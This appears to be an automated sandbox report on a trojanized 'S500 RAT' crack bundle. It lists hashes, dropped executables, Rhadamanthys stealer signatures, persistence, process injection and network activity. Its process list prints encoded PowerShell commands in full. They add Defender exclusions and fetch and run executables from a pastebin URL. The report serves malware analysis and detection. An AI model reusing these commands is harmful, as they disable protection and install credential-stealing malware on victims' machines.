memory/1880-325-0x00000000023D0000-0x00000000023E0000-memory.dmp
memory/3168-326-0x0000000000400000-0x0000000000473000-memory.dmp
memory/3840-327-0x0000000140000000-0x0000000140174000-memory.dmp
memory/1932-328-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
memory/3168-329-0x0000000001380000-0x0000000001387000-memory.dmp
memory/3168-330-0x0000000003140000-0x0000000003540000-memory.dmp
memory/3168-331-0x0000000003140000-0x0000000003540000-memory.dmp
memory/1880-332-0x00000000731F0000-0x00000000739A0000-memory.dmp
memory/1880-333-0x00000000023D0000-0x00000000023E0000-memory.dmp
memory/1880-334-0x000000007EE20000-0x000000007EE30000-memory.dmp
memory/3168-335-0x0000000003140000-0x0000000003540000-memory.dmp
memory/1932-336-0x0000000007480000-0x00000000074B2000-memory.dmp
memory/1880-337-0x000000006FA70000-0x000000006FABC000-memory.dmp
memory/1932-348-0x000000006FA70000-0x000000006FABC000-memory.dmp
memory/1880-347-0x0000000006070000-0x000000000608E000-memory.dmp
memory/1880-358-0x0000000006F20000-0x0000000006FC3000-memory.dmp
memory/3168-359-0x0000000000400000-0x0000000000473000-memory.dmp
memory/3168-360-0x0000000003140000-0x0000000003540000-memory.dmp
memory/1932-361-0x0000000007C80000-0x00000000082FA000-memory.dmp
memory/1932-362-0x0000000007640000-0x000000000765A000-memory.dmp
memory/1880-363-0x00000000070D0000-0x00000000070DA000-memory.dmp
memory/1932-364-0x00000000078E0000-0x0000000007976000-memory.dmp
memory/1880-365-0x0000000007260000-0x0000000007271000-memory.dmp
memory/1880-366-0x00000000072A0000-0x00000000072AE000-memory.dmp
memory/1932-367-0x0000000007870000-0x0000000007884000-memory.dmp
memory/1880-368-0x0000000007390000-0x00000000073AA000-memory.dmp
memory/1880-369-0x00000000072E0000-0x00000000072E8000-memory.dmp
memory/1880-372-0x00000000731F0000-0x00000000739A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4d58ec184b57efb5bc4f1adf1e7612f7 |
| SHA1 | 1952ebb9d3018da98581ee8d6a445f04ec3af7ec |
| SHA256 | 35a9aaf2902f956d01545ed2a108587cd9104ec03bad7e42351b3af999b67545 |
| SHA512 | a6302800e9d92adf5534e4e94fd4067cd5a137f3478327a15f14886e2849be58b11dae1e94a0e188464c1ce3f22d2fea18c68c603bdcfd70a7a7b915eabab06b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/1932-376-0x00000000731F0000-0x00000000739A0000-memory.dmp
memory/2660-390-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-391-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-392-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-396-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-398-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-397-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-399-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-400-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-401-0x000001C999050000-0x000001C999051000-memory.dmp
memory/2660-402-0x000001C999050000-0x000001C999051000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-15 17:44
Reported
2024-03-15 17:50
Platform
win11-20240221-en
Max time kernel
271s
Max time network
251s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\relog.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\w00ieq6n.exe | N/A |
| N/A | N/A | C:\Windows\system32\relog.exe | N/A |
| N/A | N/A | C:\Windows\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\blackCC.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\u42umg86 = "C:\\Users\\Admin\\AppData\\Local\\Systemservices\\winserv.exe" | C:\Users\Admin\w00ieq6n.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\09tf8zz4 | C:\Windows\system32\relog.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1400 set thread context of 1276 | N/A | C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\crack.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1836 set thread context of 5088 | N/A | C:\Users\Admin\w00ieq6n.exe | C:\Windows\system32\relog.exe |
| PID 5088 set thread context of 3052 | N/A | C:\Windows\system32\relog.exe | C:\Windows\system32\relog.exe |
| PID 4480 set thread context of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\S500RAT.exe | C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\S500RAT.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\crack.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\w00ieq6n.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\crack.exe
"C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\crack.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1400 -ip 1400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 284
C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\S500RAT.exe
"C:\Users\Admin\Documents\S500 RAT (2)\S500 RAT\S500RAT.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="
C:\Users\Admin\w00ieq6n.exe
"C:\Users\Admin\w00ieq6n.exe"
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Windows\S500RAT.exe
"C:\Windows\S500RAT.exe"
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4480 -ip 4480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 152
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:49825 | tcp | |
| N/A | 127.0.0.1:49827 | tcp | |
| N/A | 127.0.0.1:49829 | tcp | |
| N/A | 127.0.0.1:49831 | tcp | |
| N/A | 127.0.0.1:49833 | tcp | |
| N/A | 127.0.0.1:49835 | tcp | |
| N/A | 127.0.0.1:49837 | tcp | |
| N/A | 127.0.0.1:49839 | tcp | |
| N/A | 127.0.0.1:49841 | tcp | |
| N/A | 127.0.0.1:49843 | tcp | |
| N/A | 127.0.0.1:49845 | tcp | |
| N/A | 127.0.0.1:49848 | tcp | |
| N/A | 127.0.0.1:49851 | tcp | |
| N/A | 127.0.0.1:49853 | tcp | |
| N/A | 127.0.0.1:49856 | tcp | |
| N/A | 127.0.0.1:49858 | tcp | |
| N/A | 127.0.0.1:49860 | tcp | |
| N/A | 127.0.0.1:49863 | tcp | |
| N/A | 127.0.0.1:49866 | tcp | |
| N/A | 127.0.0.1:49876 | tcp | |
| N/A | 127.0.0.1:49879 | tcp | |
| N/A | 127.0.0.1:49883 | tcp | |
| N/A | 127.0.0.1:49886 | tcp | |
| N/A | 127.0.0.1:49888 | tcp | |
| N/A | 127.0.0.1:49890 | tcp | |
| N/A | 127.0.0.1:49900 | tcp | |
| N/A | 127.0.0.1:49902 | tcp | |
| N/A | 127.0.0.1:49904 | tcp | |
| N/A | 127.0.0.1:49906 | tcp | |
| N/A | 127.0.0.1:49908 | tcp | |
| N/A | 127.0.0.1:49910 | tcp | |
| N/A | 127.0.0.1:49912 | tcp | |
| N/A | 127.0.0.1:49914 | tcp | |
| N/A | 127.0.0.1:49916 | tcp | |
| N/A | 127.0.0.1:49919 | tcp | |
| N/A | 127.0.0.1:49921 | tcp | |
| N/A | 127.0.0.1:49924 | tcp | |
| N/A | 127.0.0.1:49926 | tcp | |
| N/A | 127.0.0.1:49928 | tcp | |
| N/A | 127.0.0.1:49930 | tcp | |
| N/A | 127.0.0.1:49932 | tcp | |
| N/A | 127.0.0.1:49934 | tcp | |
| N/A | 127.0.0.1:49936 | tcp | |
| N/A | 127.0.0.1:49938 | tcp | |
| N/A | 127.0.0.1:49940 | tcp | |
| N/A | 127.0.0.1:49943 | tcp | |
| N/A | 127.0.0.1:49945 | tcp | |
| N/A | 127.0.0.1:49947 | tcp | |
| N/A | 127.0.0.1:49949 | tcp | |
| N/A | 127.0.0.1:49951 | tcp | |
| N/A | 127.0.0.1:49953 | tcp | |
| N/A | 127.0.0.1:49955 | tcp | |
| N/A | 127.0.0.1:49957 | tcp | |
| N/A | 127.0.0.1:49959 | tcp | |
| N/A | 127.0.0.1:49961 | tcp | |
| N/A | 127.0.0.1:49963 | tcp | |
| N/A | 127.0.0.1:49965 | tcp | |
| N/A | 127.0.0.1:49967 | tcp | |
| N/A | 127.0.0.1:49969 | tcp | |
| N/A | 127.0.0.1:49972 | tcp | |
| N/A | 127.0.0.1:49974 | tcp | |
| N/A | 127.0.0.1:49976 | tcp | |
| N/A | 127.0.0.1:49979 | tcp | |
| N/A | 127.0.0.1:49981 | tcp | |
| N/A | 127.0.0.1:49984 | tcp | |
| N/A | 127.0.0.1:49987 | tcp | |
| N/A | 127.0.0.1:49989 | tcp | |
| N/A | 127.0.0.1:49992 | tcp | |
| N/A | 127.0.0.1:49994 | tcp | |
| N/A | 127.0.0.1:49997 | tcp | |
| N/A | 127.0.0.1:49999 | tcp | |
| N/A | 127.0.0.1:50001 | tcp | |
| N/A | 127.0.0.1:50003 | tcp | |
| N/A | 127.0.0.1:50005 | tcp | |
| N/A | 127.0.0.1:50007 | tcp | |
| N/A | 127.0.0.1:50009 | tcp | |
| N/A | 127.0.0.1:50011 | tcp |
Files
memory/1276-0-0x0000000000400000-0x0000000000473000-memory.dmp
memory/1276-2-0x0000000000400000-0x0000000000473000-memory.dmp
memory/1276-3-0x0000000000400000-0x0000000000473000-memory.dmp
memory/1276-4-0x0000000002D70000-0x0000000002D77000-memory.dmp
memory/1276-5-0x0000000002F90000-0x0000000003390000-memory.dmp
memory/1276-6-0x0000000002F90000-0x0000000003390000-memory.dmp
memory/1276-7-0x0000000002F90000-0x0000000003390000-memory.dmp
memory/1276-8-0x0000000002F90000-0x0000000003390000-memory.dmp
C:\Users\Admin\w00ieq6n.exe
| MD5 | 93eb0cf0043f1f507a1b94eea7b65fe4 |
| SHA1 | 148be925922c60190bde523cb60a50da9e544da1 |
| SHA256 | 6cbd8961b21b75bb176439538633191ed8364e755c8b2d049ca7281871430d30 |
| SHA512 | 94640f8dfd1ceeb8ec72be3bd40bbafb8b4b8dda584dffcd88c6c616cd65ffb9b0087ed093231db3940211a3b5c3fc8efed957c4e8a701b0a61dfe1c943ccf58 |
memory/1836-26-0x0000000140000000-0x0000000140174000-memory.dmp
memory/5088-36-0x0000000140000000-0x0000000140174000-memory.dmp
memory/4352-38-0x0000000003180000-0x00000000031B6000-memory.dmp
memory/4352-41-0x00000000032D0000-0x00000000032E0000-memory.dmp
C:\Windows\S500RAT.exe
| MD5 | 49dee6e07455a36b45c86864f9718050 |
| SHA1 | 8ec76534e134bbf18904ab9cac30abe228d882d5 |
| SHA256 | 31f004450ed5ebe14d2e9883608278c6d195b9d7d3507239fff455a56b970fd5 |
| SHA512 | c145bd46d59751f1daabcd5a9b5dc6bbb6202894578305e972242103a66bc164dd2bacfbbbfcf958f8da3c15abbd2ce3c0575826faac2345bdf879c7ee7098f7 |
C:\Windows\S500RAT.exe
| MD5 | 7ec8c1c9453c1424f31b0798919d97e1 |
| SHA1 | 847cf1870d5bc69a87d564efff87ba3224f40675 |
| SHA256 | e6e9fc64a8713b03d086be8c200d97b289bae693efe13dd241bc2d754549b7ff |
| SHA512 | eb8dd119c464e42c7957a492364c2fc5a7a576b687c890294b66b03268faabfe2d9f19d1db83fd36c8ea876d33b4cb1e1469649b344f506ca331ae2eb0d5a26f |
memory/1836-37-0x0000000140000000-0x0000000140174000-memory.dmp
C:\Windows\S500RAT.exe
| MD5 | 54d6892ecb4c927c3597e8c6244bd3f2 |
| SHA1 | f07894f47f2a6f4693378e0654331679a6b5460f |
| SHA256 | 2fb2a5b8519f3cc3eb9304206cafab73a5c6b0f8f5d5c5db5e40d3d8ebf2a52a |
| SHA512 | 893f0afd266de5423ae44edd829d0725d5a7aa5f57968123dbc5fc06d07efbfd4d41664730426c3db4a3dc9d3739ad79447283fd4e53654f8b368adb4df3398e |
memory/4352-45-0x00000000059A0000-0x0000000005FCA000-memory.dmp
memory/1276-46-0x0000000000400000-0x0000000000473000-memory.dmp
memory/4352-44-0x0000000073200000-0x00000000739B1000-memory.dmp
memory/1276-48-0x0000000002F90000-0x0000000003390000-memory.dmp
memory/4352-49-0x0000000006000000-0x0000000006022000-memory.dmp
memory/4352-50-0x00000000060A0000-0x0000000006106000-memory.dmp
memory/4352-51-0x0000000006180000-0x00000000061E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fwc5mu0.n5k.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4352-60-0x00000000061F0000-0x0000000006547000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | 9a2abaacb6701339b359620a5b2b72bd |
| SHA1 | a2e1954bda9e76ed6bf969896bc314184dc2923d |
| SHA256 | 88294e2f9c20bf98404059319618855ec4dcae00dc3f9ce35fe29c9e764b66ce |
| SHA512 | 5c848172f87b199b87f1ac02edda6e5038c0e53e13f6aaa501383716947265fdb0c3a6853fe3fc04f58a2188c9736281f4af05d5bb6879f01109cd6ddfcef7d5 |
memory/4352-68-0x0000000006650000-0x000000000666E000-memory.dmp
memory/4352-69-0x0000000006690000-0x00000000066DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | 7e726b2d2ed6fb856138b9042159b0a5 |
| SHA1 | 4963009150221761704c278507be392fe0dc57b0 |
| SHA256 | cd58b31e029fb1c7eb95b7285a170026b13262aa3ce67b410a49aae3ffa041d5 |
| SHA512 | 83cec787774b85e97cc64d608b01e59748c279649fcfa3897bc923df2d10c1e1093591fb25681a3714b728367c323f9fd5368b4649d97b8a461a09e120618b23 |
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | e1d419176a1124a2f71d1520a2b5e734 |
| SHA1 | 5b7271f15130190fb54bba74b2a863b7af3a2e75 |
| SHA256 | 555a87140f6c9ce1863f5f39dcb6990ce8f75f64d583a22cfddf5cc9eca69e0d |
| SHA512 | 18ae072babccff161c665fe7814e54a666778ce6e92053dcb8d5e15a40d1ed2b46d23e8c4a9384e42f1fde7caba2e4d487b0649409da971b675e34c8941d5860 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | dbf35eac1c87ed287c8f7cba33d133b5 |
| SHA1 | d1dbfba561f8112e5099507a18cd9465b4fcb577 |
| SHA256 | 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd |
| SHA512 | c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532 |
memory/2792-79-0x0000000000400000-0x00000000016FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
| MD5 | 462b459a2560b65a657cfecce53d682a |
| SHA1 | f0ce24faf42d2d1453c4f18fda0223b83486e5ae |
| SHA256 | 00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db |
| SHA512 | 5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b |
memory/5052-93-0x0000000000400000-0x00000000015D4000-memory.dmp
memory/1532-94-0x0000000073200000-0x00000000739B1000-memory.dmp
memory/1532-95-0x0000000004850000-0x0000000004860000-memory.dmp
memory/1532-96-0x0000000004850000-0x0000000004860000-memory.dmp
memory/4352-97-0x0000000006C30000-0x0000000006C64000-memory.dmp
memory/4352-98-0x0000000074800000-0x000000007484C000-memory.dmp
memory/4352-109-0x00000000032D0000-0x00000000032E0000-memory.dmp
memory/4352-110-0x00000000032D0000-0x00000000032E0000-memory.dmp
memory/4352-108-0x0000000007870000-0x0000000007914000-memory.dmp
memory/4352-107-0x0000000007840000-0x000000000785E000-memory.dmp
memory/4352-119-0x0000000007FF0000-0x000000000866A000-memory.dmp
memory/4352-120-0x00000000079B0000-0x00000000079CA000-memory.dmp
memory/4352-121-0x0000000007A40000-0x0000000007A4A000-memory.dmp
memory/4352-122-0x0000000007C40000-0x0000000007CD6000-memory.dmp
memory/2952-126-0x0000000000400000-0x0000000000473000-memory.dmp
memory/4352-127-0x0000000007BC0000-0x0000000007BD1000-memory.dmp
memory/4352-129-0x0000000007C00000-0x0000000007C0E000-memory.dmp
memory/4352-130-0x0000000007C10000-0x0000000007C25000-memory.dmp
memory/4352-131-0x0000000007D00000-0x0000000007D1A000-memory.dmp
memory/4352-132-0x0000000007CF0000-0x0000000007CF8000-memory.dmp
memory/1532-134-0x0000000074800000-0x000000007484C000-memory.dmp
memory/1532-143-0x0000000004850000-0x0000000004860000-memory.dmp
memory/1532-133-0x000000007FBE0000-0x000000007FBF0000-memory.dmp
memory/1532-144-0x0000000004850000-0x0000000004860000-memory.dmp
memory/4352-147-0x0000000073200000-0x00000000739B1000-memory.dmp
memory/1532-148-0x00000000072A0000-0x00000000072B1000-memory.dmp
memory/1532-149-0x00000000072D0000-0x00000000072E5000-memory.dmp
memory/2952-152-0x0000000002E70000-0x0000000003270000-memory.dmp
memory/5088-153-0x0000000140000000-0x0000000140174000-memory.dmp
memory/2952-154-0x0000000002E70000-0x0000000003270000-memory.dmp
memory/2952-155-0x0000000000400000-0x0000000000473000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6be52b7449d2aa35cc0ecab9fb7e6f04 |
| SHA1 | 74924360865f819ca322bf0bd77057caa81ecd8d |
| SHA256 | f24a1f580aaa37cab15e60e3de37c3a8e9fbcf54285d9b24efadb0818c2db775 |
| SHA512 | 62820751dfe9c7417dc3306cfdf6a615e9b31d1aaa4267982f4e1fc59e18b4ed78603e240f55d72c97d7520641032299ccdb8f60fe0cecc8c7a539fd780352f3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | d0c46cad6c0778401e21910bd6b56b70 |
| SHA1 | 7be418951ea96326aca445b8dfe449b2bfa0dca6 |
| SHA256 | 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02 |
| SHA512 | 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949 |
memory/1532-159-0x0000000073200000-0x00000000739B1000-memory.dmp